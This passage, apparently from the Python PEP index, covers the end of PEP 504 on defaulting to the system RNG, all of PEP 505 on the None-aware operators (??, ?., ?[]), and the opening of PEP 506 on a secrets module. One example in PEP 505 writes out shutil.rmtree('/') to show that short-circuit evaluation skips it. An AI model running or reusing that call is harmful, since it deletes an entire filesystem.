One of the factors that contributes to making this last aspect particularly
difficult is APIs where using them inappropriately creates a silent security
failure - one where the only way to find out that what you’re doing is
incorrect is for someone reviewing your code to say “that’s a potential
security problem”, or for a system you’re responsible for to be compromised
through such an oversight (and you’re not only still responsible for that
system when it is compromised, but your intrusion detection and auditing
mechanisms are good enough for you to be able to figure out after the event
how the compromise took place).
This kind of situation is a significant contributor to “security fatigue”,
where developers (often rightly [9]) feel that security engineers
spend all their time saying “don’t do that the easy way, it creates a
security vulnerability”.
As the designers of one of the world’s most popular languages [8],
we can help reduce that problem by making the easy way the right way (or at
least the “not wrong” way) in more circumstances, so developers and security
engineers can spend more time worrying about mitigating actually interesting
threats, and less time fighting with default language behaviours.
Discussion
Why “ensure_repeatable” over “ensure_deterministic”?
This is a case where the meaning of a word as specialist jargon conflicts with
the typical meaning of the word, even though it’s technically the same.
From a technical perspective, a “deterministic RNG” means that given knowledge
of the algorithm and the current state, you can reliably compute arbitrary
future states.
The problem is that “deterministic” on its own doesn’t convey those qualifiers,
so it’s likely to instead be interpreted as “predictable” or “not random” by
folks that are familiar with the conventional meaning, but aren’t familiar with
the additional qualifiers on the technical meaning.
A second problem with “deterministic” as a description for the traditional RNG
is that it doesn’t really tell you what you can do with the traditional RNG
that you can’t do with the system one.
“ensure_repeatable” aims to address both of those problems, as its common
meaning accurately describes the main reason for preferring the deterministic
PRNG over the system RNG: ensuring you can repeat the same series of outputs
by providing the same seed value, or by restoring a previously saved PRNG state.
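For reference, the repeatability being preserved is the existing behaviour of an explicitly created deterministic generator:
import random

rng = random.Random(12345)                 # deterministic PRNG with an explicit seed
first_run = [rng.random() for _ in range(3)]

rng.seed(12345)                            # same seed, same series of outputs
assert [rng.random() for _ in range(3)] == first_run

state = rng.getstate()                     # or capture and later restore the exact state
value = rng.random()
rng.setstate(state)
assert rng.random() == value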
Only changing the default for Python 3.6+
Some other recent security changes, such as upgrading the capabilities of the
ssl module and switching to properly verifying HTTPS certificates by
default, have been considered critical enough to justify backporting the
change to all currently supported versions of Python.
The difference in this case is one of degree - the additional benefits from
rolling out this particular change a couple of years earlier than will
otherwise be the case aren’t sufficient to justify either the additional effort
or the stability risks involved in making such an intrusive change in a
maintenance release.
Keeping the module level functions
In addition to general backwards compatibility considerations, Python is
widely used for educational purposes, and we specifically don’t want to
invalidate the wide array of educational material that assumes the availability
of the current random module API. Accordingly, this proposal ensures that
most of the public API can continue to be used not only without modification,
but without generating any new warnings.
Warning when implicitly opting in to the deterministic RNG
It’s necessary to implicitly opt in to the deterministic PRNG as Python is
widely used for modelling and simulation purposes where this is the right
thing to do, and in many cases, these software models won’t have a dedicated
maintenance team tasked with ensuring they keep working on the latest versions
of Python.
Unfortunately, explicitly calling random.seed with data from os.urandom
is also a mistake that appears in a number of the flawed “how to generate a
security token in Python” guides readily available online.
Using first DeprecationWarning, and then eventually a RuntimeWarning, to
advise against implicitly switching to the deterministic PRNG aims to
nudge future users that need a cryptographically secure RNG away from
calling random.seed() and those that genuinely need a deterministic
generator towards explicitly calling random.ensure_repeatable().
Avoiding the introduction of a userspace CSPRNG
The original discussion of this proposal on python-ideas [5] suggested
introducing a cryptographically secure pseudo-random number generator and using
that by default, rather than defaulting to the relatively slow system random
number generator.
The problem [7] with this approach is that it introduces an additional
point of failure in security sensitive situations, for the sake of applications
where the random number generation may not even be on a critical performance
path.
Applications that do need cryptographic quality randomness should be using the
system random number generator regardless of speed considerations, so in those
cases the change proposed in this PEP will fix a previously latent security defect.
Isn’t the deterministic PRNG “secure enough”?
In a word, “No” - that’s why there’s a warning in the module documentation
that says not to use it for security sensitive purposes. While we’re not
currently aware of any studies of Python’s random number generator specifically,
studies of PHP’s random number generator [3] have demonstrated the ability
to use weaknesses in that subsystem to facilitate a practical attack on
password recovery tokens in popular PHP web applications.
However, one of the rules of secure software development is that “attacks only
get better, never worse”, so it may be that by the time Python 3.6 is released
we will actually see a practical attack on Python’s deterministic PRNG publicly
documented.
Security fatigue in the Python ecosystem
Over the past few years, the computing industry as a whole has been
making a concerted effort to upgrade the shared network infrastructure we all
depend on to a “secure by default” stance. As one of the most widely used
programming languages for network service development (including the OpenStack
Infrastructure-as-a-Service platform) and for systems administration
on Linux systems in general, a fair share of that burden has fallen on the
Python ecosystem, which is understandably frustrating for Pythonistas using
Python in other contexts where these issues aren’t of as great a concern.
This consideration is one of the primary factors driving the substantial
backwards compatibility improvements in this proposal relative to the initial
draft concept posted to python-ideas [6].
Acknowledgements
Theo de Raadt, for making the suggestion to Guido van Rossum that we
seriously consider defaulting to a cryptographically secure random number
generator
Serhiy Storchaka, Terry Reedy, Petr Viktorin, and anyone else in the
python-ideas threads that suggested the approach of transparently switching
to the random.Random implementation when any of the functions that only
make sense for a deterministic RNG are called
Nathaniel Smith for providing the reference on practical attacks against
PHP’s random number generator when used to generate password reset tokens
Donald Stufft for pursuing additional discussions with network security
experts that suggested the introduction of a userspace CSPRNG would mean
additional complexity for insufficient gain relative to just using the
system RNG directly
Paul Moore for eloquently making the case for the current level of security
fatigue in the Python ecosystem
References
[1]
Visualization of data breaches involving more than 30k records (each)
(http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/)
[2]
Remote UConnect hack for Jeep Cherokee
(http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/)
[3]
PRNG based attack against password reset tokens in PHP applications
(https://media.blackhat.com/bh-us-12/Briefings/Argyros/BH_US_12_Argyros_PRNG_WP.pdf)
[4]
Search link for “python password generator”
(https://www.google.com.au/search?q=python+password+generator)
[5]
python-ideas thread discussing using a userspace CSPRNG
(https://mail.python.org/pipermail/python-ideas/2015-September/035886.html)
[6]
Initial draft concept that eventually became this PEP
(https://mail.python.org/pipermail/python-ideas/2015-September/036095.html)
[7]
Safely generating random numbers
(http://sockpuppet.org/blog/2014/02/25/safely-generate-random-numbers/)
[8]
IEEE Spectrum 2015 Top Ten Programming Languages
(http://spectrum.ieee.org/computing/software/the-2015-top-ten-programming-languages)
[9]
OWASP Top Ten Web Security Issues for 2013
(https://www.owasp.org/index.php/OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2013)
[10]
Stack Overflow answer for missing parentheses in call to print
(http://stackoverflow.com/questions/25445439/what-does-syntaxerror-missing-parentheses-in-call-to-print-mean-in-python/25445440#25445440)
[11]
Bypassing bcrypt through an insecure data cache
(http://arstechnica.com/security/2015/09/once-seen-as-bulletproof-11-million-ashley-madison-passwords-already-cracked/)
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 504 – Using the System RNG by default | Standards Track | Python currently defaults to using the deterministic Mersenne Twister random
number generator for the module level APIs in the random module, requiring
users to know that when they’re performing “security sensitive” work, they
should instead switch to using the cryptographically secure os.urandom or
random.SystemRandom interfaces or a third party library like
cryptography. |
PEP 505 – None-aware operators
Author:
Mark E. Haase <mehaase at gmail.com>, Steve Dower <steve.dower at python.org>
Status:
Deferred
Type:
Standards Track
Created:
18-Sep-2015
Python-Version:
3.8
Table of Contents
Abstract
Syntax and Semantics
Specialness of None
Grammar changes
The coalesce rule
The maybe-dot and maybe-subscript operators
Reading expressions
Examples
Standard Library
jsonify
Grab
Rejected Ideas
No-Value Protocol
Boolean-aware operators
Exception-aware operators
None-aware Function Call
? Unary Postfix Operator
Built-in maybe
Just use a conditional expression
References
Copyright
Abstract
Several modern programming languages have so-called “null-coalescing” or
“null- aware” operators, including C# [1], Dart [2], Perl, Swift, and PHP
(starting in version 7). There are also stage 3 draft proposals for their
addition to ECMAScript (a.k.a. JavaScript) [3] [4]. These operators provide
syntactic sugar for common patterns involving null references.
The “null-coalescing” operator is a binary operator that returns its left
operand if it is not null. Otherwise it returns its right operand.
The “null-aware member access” operator accesses an instance member only
if that instance is non-null. Otherwise it returns null. (This is also
called a “safe navigation” operator.)
The “null-aware index access” operator accesses an element of a collection
only if that collection is non-null. Otherwise it returns null. (This
is another type of “safe navigation” operator.)
This PEP proposes three None-aware operators for Python, based on the
definitions and other language’s implementations of those above. Specifically:
The “None coalescing” binary operator ?? returns the left hand side
if it evaluates to a value that is not None, or else it evaluates and
returns the right hand side. A coalescing ??= augmented assignment
operator is included.
The “None-aware attribute access” operator ?. (“maybe dot”) evaluates
the complete expression if the left hand side evaluates to a value that is
not None
The “None-aware indexing” operator ?[] (“maybe subscript”) evaluates
the complete expression if the left hand site evaluates to a value that is
not None
See the Grammar changes section for specifics and examples of the required
grammar changes.
See the Examples section for more realistic examples of code that could be
updated to use the new operators.
Syntax and Semantics
Specialness of None
The None object denotes the lack of a value. For the purposes of these
operators, the lack of a value indicates that the remainder of the expression
also lacks a value and should not be evaluated.
A rejected proposal was to treat any value that evaluates as “false” in a
Boolean context as not having a value. However, the purpose of these operators
is to propagate the “lack of value” state, rather than the “false” state.
Some argue that this makes None special. We contend that None is
already special, and that using it as both the test and the result of these
operators does not change the existing semantics in any way.
See the Rejected Ideas section for discussions on alternate approaches.
Grammar changes
The following rules of the Python grammar are updated to read:
augassign: ('+=' | '-=' | '*=' | '@=' | '/=' | '%=' | '&=' | '|=' | '^=' |
            '<<=' | '>>=' | '**=' | '//=' | '??=')

power: coalesce ['**' factor]
coalesce: atom_expr ['??' factor]
atom_expr: ['await'] atom trailer*
trailer: ('(' [arglist] ')' |
          '[' subscriptlist ']' |
          '?[' subscriptlist ']' |
          '.' NAME |
          '?.' NAME)
The coalesce rule
The coalesce rule provides the ?? binary operator. Unlike most binary
operators, the right-hand side is not evaluated until the left-hand side is
determined to be None.
The ?? operator binds more tightly than other binary operators as most
existing implementations of these do not propagate None values (they will
typically raise TypeError). Expressions that are known to potentially
result in None can be substituted for a default value without needing
additional parentheses.
Some examples of how implicit parentheses are placed when evaluating operator
precedence in the presence of the ?? operator:
a, b = None, None
def c(): return None
def ex(): raise Exception()
(a ?? 2 ** b ?? 3) == a ?? (2 ** (b ?? 3))
(a * b ?? c // d) == a * (b ?? c) // d
(a ?? True and b ?? False) == (a ?? True) and (b ?? False)
(c() ?? c() ?? True) == True
(True ?? ex()) == True
(c ?? ex)() == c()
Particularly for cases such as a ?? 2 ** b ?? 3, parenthesizing the
sub-expressions any other way would result in TypeError, as int.__pow__
cannot be called with None (and the fact that the ?? operator is used
at all implies that a or b may be None). However, as usual,
while parentheses are not required they should be added if it helps improve
readability.
An augmented assignment for the ?? operator is also added. Augmented
coalescing assignment only rebinds the name if its current value is None.
If the target name already has a value, the right-hand side is not evaluated.
For example:
a = None
b = ''
c = 0
a ??= 'value'
b ??= undefined_name
c ??= shutil.rmtree('/') # don't try this at home, kids
assert a == 'value'
assert b == ''
assert c == 0 and any(os.scandir('/'))
The maybe-dot and maybe-subscript operators
The maybe-dot and maybe-subscript operators are added as trailers for atoms,
so that they may be used in all the same locations as the regular operators,
including as part of an assignment target (more details below). As the
existing evaluation rules are not directly embedded in the grammar, we specify
the required changes below.
Assume that the atom is always successfully evaluated. Each trailer is
then evaluated from left to right, applying its own parameter (either its
arguments, subscripts or attribute name) to produce the value for the next
trailer. Finally, if present, await is applied.
For example, await a.b(c).d[e] is currently parsed as
['await', 'a', '.b', '(c)', '.d', '[e]'] and evaluated:
_v = a
_v = _v.b
_v = _v(c)
_v = _v.d
_v = _v[e]
await _v
When a None-aware operator is present, the left-to-right evaluation may be
short-circuited. For example, await a?.b(c).d?[e] is evaluated:
_v = a
if _v is not None:
    _v = _v.b
    _v = _v(c)
    _v = _v.d
    if _v is not None:
        _v = _v[e]
await _v
Note
await will almost certainly fail in this context, as it would in
the case where code attempts await None. We are not proposing to add a
None-aware await keyword here, and merely include it in this
example for completeness of the specification, since the atom_expr
grammar rule includes the keyword. If it were in its own rule, we would have
never mentioned it.
Parenthesised expressions are handled by the atom rule (not shown above),
which will implicitly terminate the short-circuiting behaviour of the above
transformation. For example, (a?.b ?? c).d?.e is evaluated as:
# a?.b
_v = a
if _v is not None:
    _v = _v.b

# ... ?? c
if _v is None:
    _v = c

# (...).d?.e
_v = _v.d
if _v is not None:
    _v = _v.e
When used as an assignment target, the None-aware operations may only be
used in a “load” context. That is, a?.b = 1 and a?[b] = 1 will raise
SyntaxError. Use earlier in the expression (a?.b.c = 1) is permitted,
though unlikely to be useful unless combined with a coalescing operation:
(a?.b ?? d).c = 1
Reading expressions
For the maybe-dot and maybe-subscript operators, the intention is that
expressions including these operators should be read and interpreted as for the
regular versions of these operators. In “normal” cases, the end results are
going to be identical between an expression such as a?.b?[c] and
a.b[c], and just as we do not currently read “a.b” as “read attribute b
from a if it has an attribute a or else it raises AttributeError”, there is
no need to read “a?.b” as “read attribute b from a if a is not None”
(unless in a context where the listener needs to be aware of the specific
behaviour).
For coalescing expressions using the ?? operator, expressions should either
be read as “or … if None” or “coalesced with”. For example, the expression
a.get_value() ?? 100 would be read “call a dot get_value or 100 if None”,
or “call a dot get_value coalesced with 100”.
Note
Reading code in spoken text is always lossy, and so we make no attempt to
define an unambiguous way of speaking these operators. These suggestions
are intended to add context to the implications of adding the new syntax.
Examples
This section presents some examples of common None patterns and shows what
conversion to use None-aware operators may look like.
Standard Library
Using the find-pep505.py script [5] an analysis of the Python 3.7 standard
library discovered up to 678 code snippets that could be replaced with use of
one of the None-aware operators:
$ find /usr/lib/python3.7 -name '*.py' | xargs python3.7 find-pep505.py
<snip>
Total None-coalescing `if` blocks: 449
Total [possible] None-coalescing `or`: 120
Total None-coalescing ternaries: 27
Total Safe navigation `and`: 13
Total Safe navigation `if` blocks: 61
Total Safe navigation ternaries: 8
Some of these are shown below as examples before and after converting to use the
new operators.
From bisect.py:
def insort_right(a, x, lo=0, hi=None):
    # ...
    if hi is None:
        hi = len(a)
    # ...
After updating to use the ??= augmented assignment statement:
def insort_right(a, x, lo=0, hi=None):
    # ...
    hi ??= len(a)
    # ...
From calendar.py:
encoding = options.encoding
if encoding is None:
    encoding = sys.getdefaultencoding()
optdict = dict(encoding=encoding, css=options.css)
After updating to use the ?? operator:
optdict = dict(encoding=options.encoding ?? sys.getdefaultencoding(),
               css=options.css)
From email/generator.py (and importantly note that there is no way to
substitute or for ?? in this situation):
mangle_from_ = True if policy is None else policy.mangle_from_
After updating:
mangle_from_ = policy?.mangle_from_ ?? True
From asyncio/subprocess.py:
def pipe_data_received(self, fd, data):
    if fd == 1:
        reader = self.stdout
    elif fd == 2:
        reader = self.stderr
    else:
        reader = None
    if reader is not None:
        reader.feed_data(data)
After updating to use the ?. operator:
def pipe_data_received(self, fd, data):
    if fd == 1:
        reader = self.stdout
    elif fd == 2:
        reader = self.stderr
    else:
        reader = None
    reader?.feed_data(data)
From asyncio/tasks.py:
try:
    await waiter
finally:
    if timeout_handle is not None:
        timeout_handle.cancel()
After updating to use the ?. operator:
try:
    await waiter
finally:
    timeout_handle?.cancel()
From ctypes/_aix.py:
if libpaths is None:
    libpaths = []
else:
    libpaths = libpaths.split(":")
After updating:
libpaths = libpaths?.split(":") ?? []
From os.py:
if entry.is_dir():
    dirs.append(name)
    if entries is not None:
        entries.append(entry)
else:
    nondirs.append(name)
After updating to use the ?. operator:
if entry.is_dir():
    dirs.append(name)
    entries?.append(entry)
else:
    nondirs.append(name)
From importlib/abc.py:
def find_module(self, fullname, path):
    if not hasattr(self, 'find_spec'):
        return None
    found = self.find_spec(fullname, path)
    return found.loader if found is not None else None
After partially updating:
def find_module(self, fullname, path):
    if not hasattr(self, 'find_spec'):
        return None
    return self.find_spec(fullname, path)?.loader
After extensive updating (arguably excessive, though that’s for the style
guides to determine):
def find_module(self, fullname, path):
    return getattr(self, 'find_spec', None)?.__call__(fullname, path)?.loader
From dis.py:
def _get_const_info(const_index, const_list):
    argval = const_index
    if const_list is not None:
        argval = const_list[const_index]
    return argval, repr(argval)
After updating to use the ?[] and ?? operators:
def _get_const_info(const_index, const_list):
    argval = const_list?[const_index] ?? const_index
    return argval, repr(argval)
jsonify
This example is from a Python web crawler that uses the Flask framework as its
front-end. This function retrieves information about a web site from a SQL
database and formats it as JSON to send to an HTTP client:
class SiteView(FlaskView):
    @route('/site/<id_>', methods=['GET'])
    def get_site(self, id_):
        site = db.query('site_table').find(id_)
        return jsonify(
            first_seen=site.first_seen.isoformat() if site.first_seen is not None else None,
            id=site.id,
            is_active=site.is_active,
            last_seen=site.last_seen.isoformat() if site.last_seen is not None else None,
            url=site.url.rstrip('/')
        )
Both first_seen and last_seen are allowed to be null in the
database, and they are also allowed to be null in the JSON response. JSON
does not have a native way to represent a datetime, so the server’s contract
states that any non-null date is represented as an ISO-8601 string.
Without knowing the exact semantics of the first_seen and last_seen
attributes, it is impossible to know whether the attribute can be safely or
performantly accessed multiple times.
One way to fix this code is to replace each conditional expression with an
explicit value assignment and a full if/else block:
class SiteView(FlaskView):
    @route('/site/<id_>', methods=['GET'])
    def get_site(self, id_):
        site = db.query('site_table').find(id_)

        first_seen_dt = site.first_seen
        if first_seen_dt is None:
            first_seen = None
        else:
            first_seen = first_seen_dt.isoformat()

        last_seen_dt = site.last_seen
        if last_seen_dt is None:
            last_seen = None
        else:
            last_seen = last_seen_dt.isoformat()

        return jsonify(
            first_seen=first_seen,
            id=site.id,
            is_active=site.is_active,
            last_seen=last_seen,
            url=site.url.rstrip('/')
        )
This adds ten lines of code and four new code paths to the function,
dramatically increasing the apparent complexity. Rewriting using the
None-aware attribute operator results in shorter code with more clear
intent:
class SiteView(FlaskView):
    @route('/site/<id_>', methods=['GET'])
    def get_site(self, id_):
        site = db.query('site_table').find(id_)
        return jsonify(
            first_seen=site.first_seen?.isoformat(),
            id=site.id,
            is_active=site.is_active,
            last_seen=site.last_seen?.isoformat(),
            url=site.url.rstrip('/')
        )
Grab
The next example is from a Python scraping library called Grab:
class BaseUploadObject(object):
    def find_content_type(self, filename):
        ctype, encoding = mimetypes.guess_type(filename)
        if ctype is None:
            return 'application/octet-stream'
        else:
            return ctype

class UploadContent(BaseUploadObject):
    def __init__(self, content, filename=None, content_type=None):
        self.content = content
        if filename is None:
            self.filename = self.get_random_filename()
        else:
            self.filename = filename
        if content_type is None:
            self.content_type = self.find_content_type(self.filename)
        else:
            self.content_type = content_type

class UploadFile(BaseUploadObject):
    def __init__(self, path, filename=None, content_type=None):
        self.path = path
        if filename is None:
            self.filename = os.path.split(path)[1]
        else:
            self.filename = filename
        if content_type is None:
            self.content_type = self.find_content_type(self.filename)
        else:
            self.content_type = content_type
This example contains several good examples of needing to provide default
values. Rewriting to use conditional expressions reduces the overall lines of
code, but does not necessarily improve readability:
class BaseUploadObject(object):
    def find_content_type(self, filename):
        ctype, encoding = mimetypes.guess_type(filename)
        return 'application/octet-stream' if ctype is None else ctype

class UploadContent(BaseUploadObject):
    def __init__(self, content, filename=None, content_type=None):
        self.content = content
        self.filename = (self.get_random_filename() if filename
                         is None else filename)
        self.content_type = (self.find_content_type(self.filename)
                             if content_type is None else content_type)

class UploadFile(BaseUploadObject):
    def __init__(self, path, filename=None, content_type=None):
        self.path = path
        self.filename = (os.path.split(path)[1] if filename is
                         None else filename)
        self.content_type = (self.find_content_type(self.filename)
                             if content_type is None else content_type)
The first ternary expression is tidy, but it reverses the intuitive order of
the operands: it should return ctype if it has a value and use the string
literal as fallback. The other ternary expressions are unintuitive and so
long that they must be wrapped. The overall readability is worsened, not
improved.
Rewriting using the None coalescing operator:
class BaseUploadObject(object):
    def find_content_type(self, filename):
        ctype, encoding = mimetypes.guess_type(filename)
        return ctype ?? 'application/octet-stream'

class UploadContent(BaseUploadObject):
    def __init__(self, content, filename=None, content_type=None):
        self.content = content
        self.filename = filename ?? self.get_random_filename()
        self.content_type = content_type ?? self.find_content_type(self.filename)

class UploadFile(BaseUploadObject):
    def __init__(self, path, filename=None, content_type=None):
        self.path = path
        self.filename = filename ?? os.path.split(path)[1]
        self.content_type = content_type ?? self.find_content_type(self.filename)
This syntax has an intuitive ordering of the operands. In find_content_type,
for example, the preferred value ctype appears before the fallback value.
The terseness of the syntax also makes for fewer lines of code and less code to
visually parse, and reading from left-to-right and top-to-bottom more accurately
follows the execution flow.
Rejected Ideas
The first three ideas in this section are oft-proposed alternatives to treating
None as special. For further background on why these are rejected, see their
treatment in PEP 531 and
PEP 532 and the associated
discussions.
No-Value Protocol
The operators could be generalised to user-defined types by defining a protocol
to indicate when a value represents “no value”. Such a protocol may be a dunder
method __has_value__(self) that returns True if the value should be
treated as having a value, and False if the value should be treated as no
value.
With this generalization, object would implement a dunder method equivalent
to this:
def __has_value__(self):
    return True
NoneType would implement a dunder method equivalent to this:
def __has_value__(self):
    return False
In the specification section, all uses of x is None would be replaced with
not x.__has_value__().
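To make the desugaring concrete, here is a minimal sketch, assuming the
hypothetical __has_value__ protocol existed (the coalesce helper name is
purely illustrative and not part of the proposal):
# Sketch only: "coalesce(a, b)" approximates what "a ?? b" would mean under
# the hypothetical __has_value__ protocol.  Note that the real operator
# would short-circuit and not evaluate the right operand at all when the
# left operand has a value; a plain function cannot express that.
def coalesce(value, fallback):
    return value if value.__has_value__() else fallback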
This generalization would allow for domain-specific “no-value” objects to be
coalesced just like None. For example, the pyasn1 package has a type
called Null that represents an ASN.1 null:
>>> from pyasn1.type import univ
>>> univ.Null() ?? univ.Integer(123)
Integer(123)
Similarly, values such as math.nan and NotImplemented could be treated
as representing no value.
However, the “no-value” nature of these values is domain-specific, which means
they should be treated as a value by the language. For example,
math.nan.imag is well defined (it’s 0.0), and so short-circuiting
math.nan?.imag to return math.nan would be incorrect.
As None is already defined by the language as being the value that
represents “no value”, and the current specification would not preclude
switching to a protocol in the future (though changes to built-in objects would
not be compatible), this idea is rejected for now.
Boolean-aware operators
This suggestion is fundamentally the same as adding a no-value protocol, and so
the discussion above also applies.
Similar behavior to the ?? operator can be achieved with an or
expression, however or checks whether its left operand is false-y and not
specifically None. This approach is attractive, as it requires fewer changes
to the language, but ultimately does not solve the underlying problem correctly.
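For example, substituting or for a None test silently replaces false-y values
that the caller passed deliberately; a small illustrative sketch (the function
and parameter names are invented):
def fetch(timeout=None):
    # Falsey check: a caller who deliberately passes timeout=0 gets 30 instead.
    timeout = timeout or 30
    ...

def fetch_none_aware(timeout=None):
    # None check (what "timeout ?? 30" would do): 0 is preserved,
    # only None is replaced by the default.
    timeout = timeout if timeout is not None else 30
    ...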
Assuming the check is for truthiness rather than None, there is no longer a
need for the ?? operator. However, applying this check to the ?. and
?[] operators prevents perfectly valid operations from applying.
Consider the following example, where get_log_list() may return either a
list containing current log messages (potentially empty), or None if logging
is not enabled:
lst = get_log_list()
lst?.append('A log message')
If ?. is checking for true values rather than specifically None and the
log has not been initialized with any items, no item will ever be appended. This
violates the obvious intent of the code, which is to append an item. The
append method is available on an empty list, as are all other list methods,
and there is no reason to assume that these members should not be used because
the list is presently empty.
Further, there is no sensible result to use in place of the expression. A
normal lst.append returns None, but under this idea lst?.append may
result in either [] or None, depending on the value of lst. As with
the examples in the previous section, this makes no sense.
As checking for truthiness rather than None results in apparently valid
expressions no longer executing as intended, this idea is rejected.
Exception-aware operators
Arguably, the reason to short-circuit an expression when None is encountered
is to avoid the AttributeError or TypeError that would be raised under
normal circumstances. As an alternative to testing for None, the ?. and
?[] operators could instead handle AttributeError and TypeError
raised by the operation and skip the remainder of the expression.
This produces a transformation for a?.b.c?.d.e similar to this:
_v = a
try:
    _v = _v.b
except AttributeError:
    pass
else:
    _v = _v.c
    try:
        _v = _v.d
    except AttributeError:
        pass
    else:
        _v = _v.e
One open question is which value should be returned as the expression when an
exception is handled. The above example simply leaves the partial result, but
this is not helpful for replacing with a default value. An alternative would be
to force the result to None, which then raises the question as to why
None is special enough to be the result but not special enough to be the
test.
Secondly, this approach masks errors within code executed implicitly as part of
the expression. For ?., any AttributeError within a property or
__getattr__ implementation would be hidden, and similarly for ?[] and
__getitem__ implementations.
Similarly, simple typing errors such as {}?.ietms() could go unnoticed.
Existing conventions for handling these kinds of errors in the form of the
getattr builtin and the .get(key, default) method pattern established by
dict show that it is already possible to explicitly use this behaviour.
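For instance, the getattr default already exhibits the same error-hiding in
current Python; a small invented example:
class Sensor:
    @property
    def reading(self):
        # Bug: _raw is never assigned, so this raises AttributeError internally.
        return self._raw.value

print(getattr(Sensor(), 'reading', None))  # prints None, silently hiding the bug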
As this approach would hide errors in code, it is rejected.
None-aware Function Call
The None-aware syntax applies to attribute and index access, so it seems
natural to ask if it should also apply to function invocation syntax. It might
be written as foo?(), where foo is only called if it is not None.
This has been deferred on the basis of the proposed operators being intended
to aid traversal of partially populated hierarchical data structures, not
for traversal of arbitrary class hierarchies. This is reflected in the fact
that none of the other mainstream languages that already offer this syntax
have found it worthwhile to support a similar syntax for optional function
invocations.
A workaround similar to that used by C# would be to write
maybe_none?.__call__(arguments). If the callable is None, the
expression will not be evaluated. (The C# equivalent uses ?.Invoke() on its
callable type.)
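In current Python the same intent is normally written with an explicit test;
a minimal sketch with invented names:
def notify(callback=None, message=''):
    # What the hypothetical "callback?(message)" would express:
    # call the object only if it is not None.
    if callback is not None:
        callback(message)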
? Unary Postfix Operator
To generalize the None-aware behavior and limit the number of new operators
introduced, a unary, postfix operator spelled ? was suggested. The idea is
that ? might return a special object that could would override dunder
methods that return self. For example, foo? would evaluate to foo if
it is not None, otherwise it would evaluate to an instance of
NoneQuestion:
class NoneQuestion():
    def __call__(self, *args, **kwargs):
        return self

    def __getattr__(self, name):
        return self

    def __getitem__(self, key):
        return self
With this new operator and new type, an expression like foo?.bar[baz]
evaluates to NoneQuestion if foo is None. This is a nifty
generalization, but it’s difficult to use in practice since most existing code
won’t know what NoneQuestion is.
Going back to one of the motivating examples above, consider the following:
>>> import json
>>> created = None
>>> json.dumps({'created': created?.isoformat()})
The JSON serializer does not know how to serialize NoneQuestion, nor will
any other API. This proposal would actually require lots of specialized logic
throughout the standard library and any third party library.
At the same time, the ? operator may also be too general, in the sense
that it can be combined with any other operator. What should the following
expressions mean?:
>>> x? + 1
>>> x? -= 1
>>> x? == 1
>>> ~x?
This degree of generalization is not useful. The operators actually proposed
herein are intentionally limited to a few operators that are expected to make it
easier to write common code patterns.
Built-in maybe
Haskell has a concept called Maybe that
encapsulates the idea of an optional value without relying on any special
keyword (e.g. null) or any special instance (e.g. None). In Haskell, the
purpose of Maybe is to avoid separate handling of “something” and “nothing”.
A Python package called pymaybe provides a
rough approximation. The documentation shows the following example:
>>> maybe('VALUE').lower()
'value'
>>> maybe(None).invalid().method().or_else('unknown')
'unknown'
The function maybe() returns either a Something instance or a
Nothing instance. Similar to the unary postfix operator described in the
previous section, Nothing overrides dunder methods in order to allow
chaining on a missing value.
Note that or_else() is eventually required to retrieve the underlying value
from pymaybe’s wrappers. Furthermore, pymaybe does not short circuit any
evaluation. Although pymaybe has some strengths and may be useful in its own
right, it also demonstrates why a pure Python implementation of coalescing is
not nearly as powerful as support built into the language.
The idea of adding a builtin maybe type to enable this scenario is rejected.
Just use a conditional expression
Another common way to initialize default values is to use the ternary operator.
Here is an excerpt from the popular Requests package:
data = [] if data is None else data
files = [] if files is None else files
headers = {} if headers is None else headers
params = {} if params is None else params
hooks = {} if hooks is None else hooks
This particular formulation has the undesirable effect of putting the operands
in an unintuitive order: the brain thinks, “use data if possible and use
[] as a fallback,” but the code puts the fallback before the preferred
value.
The author of this package could have written it like this instead:
data = data if data is not None else []
files = files if files is not None else []
headers = headers if headers is not None else {}
params = params if params is not None else {}
hooks = hooks if hooks is not None else {}
This ordering of the operands is more intuitive, but it requires 4 extra
characters (for “not “). It also highlights the repetition of identifiers:
data if data, files if files, etc.
When written using the None coalescing operator, the sample reads:
data = data ?? []
files = files ?? []
headers = headers ?? {}
params = params ?? {}
hooks = hooks ?? {}
References
[1]
C# Reference: Operators
(https://learn.microsoft.com/en/dotnet/csharp/language-reference/operators/)
[2]
A Tour of the Dart Language: Operators
(https://www.dartlang.org/docs/dart-up-and-running/ch02.html#operators)
[3]
Proposal: Nullish Coalescing for JavaScript
(https://github.com/tc39/proposal-nullish-coalescing)
[4]
Proposal: Optional Chaining for JavaScript
(https://github.com/tc39/proposal-optional-chaining)
[5]
Associated scripts
(https://github.com/python/peps/tree/master/pep-0505/)
Copyright
This document has been placed in the public domain.
| Deferred | PEP 505 – None-aware operators | Standards Track | Several modern programming languages have so-called “null-coalescing” or
“null-aware” operators, including C# [1], Dart [2], Perl, Swift, and PHP
(starting in version 7). There are also stage 3 draft proposals for their
addition to ECMAScript (a.k.a. JavaScript) [3] [4]. These operators provide
syntactic sugar for common patterns involving null references. |
PEP 506 – Adding A Secrets Module To The Standard Library
Author:
Steven D’Aprano <steve at pearwood.info>
Status:
Final
Type:
Standards Track
Created:
19-Sep-2015
Python-Version:
3.6
Post-History:
Table of Contents
Abstract
Definitions
Rationale
Proposal
API and Implementation
Default arguments
Naming conventions
Alternatives
Comparison To Other Languages
What Should Be The Name Of The Module?
Frequently Asked Questions
References
Copyright
Abstract
This PEP proposes the addition of a module for common security-related
functions such as generating tokens to the Python standard library.
Definitions
Some common abbreviations used in this proposal:
PRNG: Pseudo Random Number Generator. A deterministic algorithm used
to produce random-looking numbers with certain desirable
statistical properties.
CSPRNG: Cryptographically Strong Pseudo Random Number Generator. An
algorithm used to produce random-looking numbers which are
resistant to prediction.
MT: Mersenne Twister. An extensively studied PRNG which is currently
used by the random module as the default.
Rationale
This proposal is motivated by concerns that Python’s standard library
makes it too easy for developers to inadvertently make serious security
errors. Theo de Raadt, the founder of OpenBSD, contacted Guido van Rossum
and expressed some concern [1] about the use of MT for generating sensitive
information such as passwords, secure tokens, session keys and similar.
Although the documentation for the random module explicitly states that
the default is not suitable for security purposes [2], it is strongly
believed that this warning may be missed, ignored or misunderstood by
many Python developers. In particular:
developers may not have read the documentation and consequently
not seen the warning;
they may not realise that their specific use of the module has security
implications; or
not realising that there could be a problem, they have copied code
(or learned techniques) from websites which don’t offer best
practices.
